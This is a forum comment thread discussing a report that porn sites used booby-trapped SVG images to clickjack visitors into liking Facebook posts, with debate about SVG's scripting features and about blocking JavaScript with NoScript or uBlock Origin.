> Security firm Malwarebytes on Friday said it recently discovered that porn sites have been seeding boobytrapped .svg files to select visitors. When one of these people clicks on the image, it causes browsers to surreptitiously register a like for Facebook posts promoting the site.
I think I'm missing something; if you can embed arbitrary JavaScript in the SVG, why is a click necessary to make that JavaScript run? And if JavaScript on your page can exploit CSRF on Facebook, why is embedding it in an SVG necessary?
mathgeek · 2m ago
> I think I'm missing something; if you can embed arbitrary JavaScript in the SVG, why is a click necessary to make that JavaScript run? And if JavaScript on your page can exploit CSRF on Facebook, why is embedding it in an SVG necessary?
A human clicking something on the site tends to get around bot detection and similar systems put in place to prevent automation. This is a basic “get the user to take an action they don’t know the outcome of” attack.
mananaysiempre · 2h ago
> The Scalable Vector Graphics format is an open standard for rendering two-dimensional graphics.
It would be nice if we had one of those, but SVG is not it, at least not unless you’re willing to gloss HTML as “an open format for rendering reflowable text”. SVG is a full platform for web applications with fixed-layout graphics and rich animations, essentially Flash with worse development tools.
There have been some attempts to define a subset of SVG that represents a picture, like SVG Tiny, but that feels about as likely to succeed as defining JSON by cutting things out of JavaScript. (I mean, it kind of worked for making EPUB from HTML+CSS... If you disregard all the insane feature variation across e-readers that is.) Meanwhile, other vector graphics formats are either ancient and not very common (CGM, EPS, WMF/EMF) or exotic and very not common (HVIF, IconVG, TinyVG).
(My personal benchmark for an actual vector format would be: does it allow the renderer to avoid knowing the peculiarities of Arabic, Burmese, Devanagari, or Mongolian?)
mouse_ · 4m ago
I still miss Flash
michaelt · 2h ago
I think some people on the SVG design committee were aiming to replace Flash for things like browser games, and wanted animations and javascript and so on to support that role.
That lead to the weird situation where browsers have two ways of embedding an SVG into a web page - embed in an <img> tag and the javascript won't run, but embed it in an <iframe> and it will (but of course iframe height can't auto-size...)
The javascript also means pretty much no user-generated-content sites allow the upload of SVGs. Wikipedia is the only place I can think of - and even they serve the SVG as a PNG almost everywhere.
kevin_thibedeau · 2h ago
You can also embed in <object>.
kibibu · 2h ago
You can also just throw an SVG element straight into your html
vaylian · 1h ago
xmlns namespaces for the win!
guerrilla · 51m ago
I miss XML. It made so much sense. XSLT was awesome.
All the more reason to block all JS by default with add-ons like NoScript or uBO and manage a whitelist.
It's a bit annoying the first few days, but then the usual sites you frequent will all be whitelisted and all that's left are random sites you come across infrequently.
Santosh83 · 32m ago
This used to be the case many years ago. But these days practically every site pulls in content from several other sites, sometimes dozens. Fine tuning noscript to get such a site to work without obscure breakage will take a long time of trial & error, reloading again & again. Now consider that you've to do this for every one of your regular sites.
Noscript is just too painful for people who want to just browse the web. Its the gentoo of browser extensions. People with massive time & patience can do it yes, but the rest of us are best served by uBlock & standard browser protections.
JohnFen · 4m ago
> But these days practically every site pulls in content from several other sites, sometimes dozens.
And excluding that content almost invariably improves the page.
zahlman · 20m ago
> But these days practically every site pulls in content from several other sites, sometimes dozens.
They do, but as a long-time NoScript user I can tell you from personal experience that this content rarely does anything important, and leaving it out often improves your UX. Problems like you describe pop up... from time to time, for individual sites, maybe a few times a year, and definitely not on "regular sites".
edoceo · 24m ago
> the gentoo of browser extensions
I was already convinced, you don't need to keep selling it ;)
gruez · 1h ago
>It's a bit annoying the first few days, but then the usual sites you frequent will all be whitelisted and all that's left are random sites you come across infrequently.
How does this work in reality? Do you just whitelist every site you come across if it's broken? What's the security advantage here? Or do you bail if it requires javascript? What about the proliferation of sites that don't really need javascript, but you need to enable it anyways because the site's security provider needs it to verify you're not a bot?
zahlman · 14m ago
> Do you just whitelist every site you come across if it's broken?
I look at the breakage, consider how the site was promoted to me, and make a decision.
> What's the security advantage here?
Most of the bad stuff comes from third parties and doesn't provide essential functionality. A whitelist means you're unblocking one domain at a time, starting with the first party. If there's still an issue, it's usually clear what needs unblocking (e.g. a popular CDN, or one with a name that matches the primary domain) and what's a junk ad server or third-party tracking etc. You can even selectively enable various Google domains for example so that GMail still works but various third-party Google annoyances are suppressed.
> What about the proliferation of sites that don't really need javascript, but you need to enable it anyways because the site's security provider needs it to verify you're not a bot?
Depends on trust levels of course, but there's at least some investigation that can be done to see that it actually is coming from Anubis or Cloudflare.
JohnFen · 2m ago
> Or do you bail if it requires javascript?
I do. If a site just doesn't work without JS, it's not likely to be a site that is valuable to me so nothing is lost.
lemoncookiechip · 28m ago
First, I use both uBO + NoScript + ClearURLs (removes tracking from URLs) + FastForward (Circumvents sites like adfly) + A pop-up blocker of your choice (stronger blocking than default also whitelist only in my case). They're all popular add-ons on Firefox and should also be available on Chrome, or variants of them. You don't need them all, uBO is more than fine for most use cases, I've just gotten used to it for a few years.
>Do you just whitelist every site you come across if it's broken?
Mostly, yes, often temporarily for that session, unless I do not trust a website, then I leave. How I deem what is trustworthy or not is just based on my own browsing experience I guess.
>What's the security advantage here?
You can block scripts, frames, media, webgl... Meaning no ads, no JS... Which helps minimize the more common ways to spread malware, or certain dark patterns, as well as just making browsing certain sites more pleasant without all the annoying stuff around.
>Or do you bail if it requires javascript?
If I don't trust a website, yes.
>What about the proliferation of sites that don't really need javascript, but you need to enable it anyways because the site's security provider needs it to verify you're not a bot?
Not all sites require JS to work, or when they do, they do not require every single JS domain on a website to work. An example of this would be something like many of the popular news sites which try to load sometimes JS from 10 different domains or more and only really require one or none to be usable. Take CNN, I do not need to whitelist it's main domain via NoScript to read articles or navigate, but the moment I whitelist CNN.com, i see a flood of other domains to whitelist which are definitely not needed, like CNN.io, cookielaw.org, optimizely.com, etc...
Take Hacker News. It's viable without JS, I can read, navigate and comment, but if I want to use the search function, I need to whitelist algolia.com (which powers the search) or else I just see "This page will only work with JavaScript enabled". The search function not working is the most common issue you'll find if you block all JS by default.
gruez · 16m ago
>You can block scripts, frames, media, webgl... Meaning no ads, no JS... Which helps minimize the more common ways to spread malware, or certain dark patterns, as well as just making browsing certain sites more pleasant without all the annoying stuff around.
>Not all sites require JS to work, or when they do, they do not require every single JS domain on a website to work. An example of this would be something like many of the popular news sites which try to load sometimes JS from 10 different domains or more and only really require one or none to be usable. Take CNN, I do not need to whitelist it's main domain via NoScript to read articles or navigate, but the moment I whitelist CNN.com, i see a flood of other domains to whitelist which are definitely not needed, like CNN.io, cookielaw.org, optimizely.com, etc...
Doesn't the default ublock filter lists, plus maybe an extension for auto-closing cookie banners get most of those?
ndriscoll · 1h ago
> Or do you bail if it requires javascript?
It depends, but frequently, yes. e.g. If I were about to read a tech blog, and see it's from someone that can't make a couple paragraphs work without scripting, then that raises the chance that whatever they had to say was not going to be valuable since they evidently don't know the basics.
It's the frontend version of people writing about distributed clusters to handle a load that a single minipc could comfortably handle.
gruez · 22m ago
>It depends, but frequently, yes. e.g. If I were about to read a tech blog, and see it's from someone that can't make a couple paragraphs work without scripting, then that raises the chance that whatever they had to say was not going to be valuable since they evidently don't know the basics.
Seems only narrowly applicable. I can see how you can use this logic to discount articles like "how to make a good blog" or whatever, but that's presumably only a tiny minority of article you'd read. If the topic is literally anything else it doesn't really hold. It doesn't seem fair to discount whatever an AI engineer or DBA has to say because they don't share the same fanaticism of lightweight sites as you. On the flip side I see plenty of AI generated slop that works fine with javascript disabled, because they're using some sort of SaaS (think medium) or static site generator.
JohnFen · 27s ago
> because they don't share the same fanaticism of lightweight sites as you.
For me, it's not about sites being lightweight, it's about sites not being trustworthy enough to allow them to run code on my machine.
rep_lodsb · 11m ago
A bit of fanaticism might be exactly what is needed to push back against the web becoming completely unusable.
bogwog · 28m ago
For me, if the site is broken and I'm interested in the content, I sometimes enable JavaScript temporarily without adding it to my whitelist. Deciding what to do when I encounter a broken site is the easy part.
The challenge is sites like StackOverflow which don't completely break, but have annoying formatting issues. Fortunately, uBlock lets you block specific elements easily with a few clicks, and I think you can even sync it to your phone.
gruez · 19m ago
>For me, if the site is broken and I'm interested in the content, I sometimes enable JavaScript temporarily without adding it to my whitelist. Deciding what to do when I encounter a broken site is the easy part.
But that basically negates all security benefits, because all it takes to get a 0day payload to run is to make the content sufficiently enticing and make javascript "required" for viewing the site. You might save some battery/data usage, but if you value your time at all I suspect any benefits is going to be eaten by you having to constantly whitelist sites.
rep_lodsb · 16m ago
Personally, if some random link I click doesn't work without scripts at all, chances are that it's not worth the effort and potential security/privacy compromise anyway. But in many cases, the content is readable, with perhaps some layout breakage. Might even get around paywalls by blocking JS.
Even if other users do indeed whitelist everything needed in order to make sites work, they will still end up with many/most of the third-party scripts blocked.
mindslight · 1h ago
Investing in NoScript can actually make pages faster, even if you end up enabling a bunch of javascript for functionality. For example, I remember having to whitelist only about half the resources used by homedepot.com. The rest was just shameless surveillance bloat, continually backhauling gobs of data as you were merely viewing the page. The site loaded and ran quicker without it.
bogwog · 26m ago
FYI, uBlock Origin has javascript blocking features just like NoScript, so if you're already using it as your ad blocker, you don't need a separate extension to block javascript too
lemoncookiechip · 19m ago
This is absolutely true. But personally I find NoScript's UI more intuitive to use for JS domain blocking (mostly because I've been using it for years now). I also used to use uMatrix by the same author as uBO before it was deprecated on Chromium browsers.
ndriscoll · 2h ago
> Facebook regularly shuts down accounts that engage in these sorts of abuse.
But does not fix the CSRF vulnerability, apparently.
mathiaspoint · 2h ago
Probably because they need it themselves for data collection.
Ars article links to Malwarebytes but Ars article is better. The headline is better, it's most interesting that they run code from svg. Ars also adds context how the same hole was also used before to hijack Microsoft accounts and also by the Russians. Whereas Malwarebytes is mostly about pornsite clickjacking to like Facebook posts (and complains about age verification). However it has a bit more technical details too. Read both I guess?
lostmsu · 1h ago
What's the hole? Neither appear to say.
cheschire · 2h ago
Finally, a reason why porn in incognito mode is actually a safety mechanism.
ta1243 · 2h ago
Running facebook in incognito mode, or at least in a separate container, is also an essential safety mechanism.
WarOnPrivacy · 21m ago
> Running facebook in a separate container is also an essential safety mechanism.
Yes!. And that container is in a Ffx instance, accessed as a remote app (here now but diff container).
medwards666 · 1h ago
... or just not running Faecesbook at all.
WarOnPrivacy · 16m ago
> ... or just not running Faecesbook at all.
At one time I agreed and had even deleted my genuine FB acct. But had to create another one briefly in 2021 to find a rental - where I live now.
I still have my ancient fake FB acct for Marketplace, etc but it's walled off.
QAkICoU7IDNkpFu · 2h ago
“The user will have to be logged in on Facebook for this to work, but we know many people keep Facebook open for easy access.”
Well there's your problem right there.
mananaysiempre · 32m ago
Bog-standard CSRF is what that is. It’s essentially the second thing you guard against, right after sanitizing inputs to prevent XSS and SQL injection.
shazbotter · 32m ago
People still have Facebook accounts? I genuinely don't know why anyone does at this point.
If you are a woman, did you know Facebook has been stealing menstruation data from apps and using it to target ads to you?
If you take photos with your smartphone, you know meta has been using them to train their ai? Even if you haven't published them on Facebook?
To say nothing of Facebook's complicity in dividing cultures and fomenting violence and hate...
Havoc · 26m ago
A ton of friends still use Facebook messenger as their primary way to reach them
lostmsu · 1h ago
This makes no sense. How does SVG click Facebook like button? Is there a vulnerability? The post doesn't say anything like that.
Why are they clicking like buttons instead of stealing money from bank accounts then?
zb3 · 1h ago
Yeah, at first I thought this was about a browser 0day.. but no, so where is the vulnerability? Is Facebook vulnerable?
saagarjha · 2h ago
I'm curious how you can click the like button using JavaScript…
55555 · 1h ago
The user has to click on the image, so I think the SVG is embedding the FB like button onto the page and drawing another element on top of it to hide it.
johnisgood · 1h ago
Where is the SVG only?
ajross · 2h ago
SVG really is just an awful format. What the market wanted was a clean, easily parseable specification for vector image data based on a solid rendering specification. What it got was an extensible HTML-like scripting language where all the vector stuff was ad hoc and poorly implemented, and where (this is the bit that absolutely drives me up the wall) the actual image data is not stored in the metadata format they chose. You have to parse this entirely different string format if you want to extract the points on your curve or whatever!
I think I'm missing something; if you can embed arbitrary JavaScript in the SVG, why is a click necessary to make that JavaScript run? And if JavaScript on your page can exploit CSRF on Facebook, why is embedding it in an SVG necessary?
A human clicking something on the site tends to get around bot detection and similar systems put in place to prevent automation. This is a basic “get the user to take an action they don’t know the outcome of” attack.
It would be nice if we had one of those, but SVG is not it, at least not unless you’re willing to gloss HTML as “an open format for rendering reflowable text”. SVG is a full platform for web applications with fixed-layout graphics and rich animations, essentially Flash with worse development tools.
There have been some attempts to define a subset of SVG that represents a picture, like SVG Tiny, but that feels about as likely to succeed as defining JSON by cutting things out of JavaScript. (I mean, it kind of worked for making EPUB from HTML+CSS... If you disregard all the insane feature variation across e-readers that is.) Meanwhile, other vector graphics formats are either ancient and not very common (CGM, EPS, WMF/EMF) or exotic and very not common (HVIF, IconVG, TinyVG).
(My personal benchmark for an actual vector format would be: does it allow the renderer to avoid knowing the peculiarities of Arabic, Burmese, Devanagari, or Mongolian?)
That lead to the weird situation where browsers have two ways of embedding an SVG into a web page - embed in an <img> tag and the javascript won't run, but embed it in an <iframe> and it will (but of course iframe height can't auto-size...)
The javascript also means pretty much no user-generated-content sites allow the upload of SVGs. Wikipedia is the only place I can think of - and even they serve the SVG as a PNG almost everywhere.
It's a bit annoying the first few days, but then the usual sites you frequent will all be whitelisted and all that's left are random sites you come across infrequently.
Noscript is just too painful for people who want to just browse the web. Its the gentoo of browser extensions. People with massive time & patience can do it yes, but the rest of us are best served by uBlock & standard browser protections.
And excluding that content almost invariably improves the page.
They do, but as a long-time NoScript user I can tell you from personal experience that this content rarely does anything important, and leaving it out often improves your UX. Problems like you describe pop up... from time to time, for individual sites, maybe a few times a year, and definitely not on "regular sites".
I was already convinced, you don't need to keep selling it ;)
How does this work in reality? Do you just whitelist every site you come across if it's broken? What's the security advantage here? Or do you bail if it requires javascript? What about the proliferation of sites that don't really need javascript, but you need to enable it anyways because the site's security provider needs it to verify you're not a bot?
I look at the breakage, consider how the site was promoted to me, and make a decision.
> What's the security advantage here?
Most of the bad stuff comes from third parties and doesn't provide essential functionality. A whitelist means you're unblocking one domain at a time, starting with the first party. If there's still an issue, it's usually clear what needs unblocking (e.g. a popular CDN, or one with a name that matches the primary domain) and what's a junk ad server or third-party tracking etc. You can even selectively enable various Google domains for example so that GMail still works but various third-party Google annoyances are suppressed.
> What about the proliferation of sites that don't really need javascript, but you need to enable it anyways because the site's security provider needs it to verify you're not a bot?
Depends on trust levels of course, but there's at least some investigation that can be done to see that it actually is coming from Anubis or Cloudflare.
I do. If a site just doesn't work without JS, it's not likely to be a site that is valuable to me so nothing is lost.
>Do you just whitelist every site you come across if it's broken?
Mostly, yes, often temporarily for that session, unless I do not trust a website, then I leave. How I deem what is trustworthy or not is just based on my own browsing experience I guess.
>What's the security advantage here?
You can block scripts, frames, media, webgl... Meaning no ads, no JS... Which helps minimize the more common ways to spread malware, or certain dark patterns, as well as just making browsing certain sites more pleasant without all the annoying stuff around.
>Or do you bail if it requires javascript?
If I don't trust a website, yes.
>What about the proliferation of sites that don't really need javascript, but you need to enable it anyways because the site's security provider needs it to verify you're not a bot?
Not all sites require JS to work, or when they do, they do not require every single JS domain on a website to work. An example of this would be something like many of the popular news sites which try to load sometimes JS from 10 different domains or more and only really require one or none to be usable. Take CNN, I do not need to whitelist it's main domain via NoScript to read articles or navigate, but the moment I whitelist CNN.com, i see a flood of other domains to whitelist which are definitely not needed, like CNN.io, cookielaw.org, optimizely.com, etc...
Take Hacker News. It's viable without JS, I can read, navigate and comment, but if I want to use the search function, I need to whitelist algolia.com (which powers the search) or else I just see "This page will only work with JavaScript enabled". The search function not working is the most common issue you'll find if you block all JS by default.
>Not all sites require JS to work, or when they do, they do not require every single JS domain on a website to work. An example of this would be something like many of the popular news sites which try to load sometimes JS from 10 different domains or more and only really require one or none to be usable. Take CNN, I do not need to whitelist it's main domain via NoScript to read articles or navigate, but the moment I whitelist CNN.com, i see a flood of other domains to whitelist which are definitely not needed, like CNN.io, cookielaw.org, optimizely.com, etc...
Doesn't the default ublock filter lists, plus maybe an extension for auto-closing cookie banners get most of those?
It depends, but frequently, yes. e.g. If I were about to read a tech blog, and see it's from someone that can't make a couple paragraphs work without scripting, then that raises the chance that whatever they had to say was not going to be valuable since they evidently don't know the basics.
It's the frontend version of people writing about distributed clusters to handle a load that a single minipc could comfortably handle.
Seems only narrowly applicable. I can see how you can use this logic to discount articles like "how to make a good blog" or whatever, but that's presumably only a tiny minority of article you'd read. If the topic is literally anything else it doesn't really hold. It doesn't seem fair to discount whatever an AI engineer or DBA has to say because they don't share the same fanaticism of lightweight sites as you. On the flip side I see plenty of AI generated slop that works fine with javascript disabled, because they're using some sort of SaaS (think medium) or static site generator.
For me, it's not about sites being lightweight, it's about sites not being trustworthy enough to allow them to run code on my machine.
The challenge is sites like StackOverflow which don't completely break, but have annoying formatting issues. Fortunately, uBlock lets you block specific elements easily with a few clicks, and I think you can even sync it to your phone.
But that basically negates all security benefits, because all it takes to get a 0day payload to run is to make the content sufficiently enticing and make javascript "required" for viewing the site. You might save some battery/data usage, but if you value your time at all I suspect any benefits is going to be eaten by you having to constantly whitelist sites.
Even if other users do indeed whitelist everything needed in order to make sites work, they will still end up with many/most of the third-party scripts blocked.
But does not fix the CSRF vulnerability, apparently.
The linked article just regurtitates the source.
Yes!. And that container is in a Ffx instance, accessed as a remote app (here now but diff container).
At one time I agreed and had even deleted my genuine FB acct. But had to create another one briefly in 2021 to find a rental - where I live now.
I still have my ancient fake FB acct for Marketplace, etc but it's walled off.
Well there's your problem right there.
If you are a woman, did you know Facebook has been stealing menstruation data from apps and using it to target ads to you?
If you take photos with your smartphone, you know meta has been using them to train their ai? Even if you haven't published them on Facebook?
To say nothing of Facebook's complicity in dividing cultures and fomenting violence and hate...
Why are they clicking like buttons instead of stealing money from bank accounts then?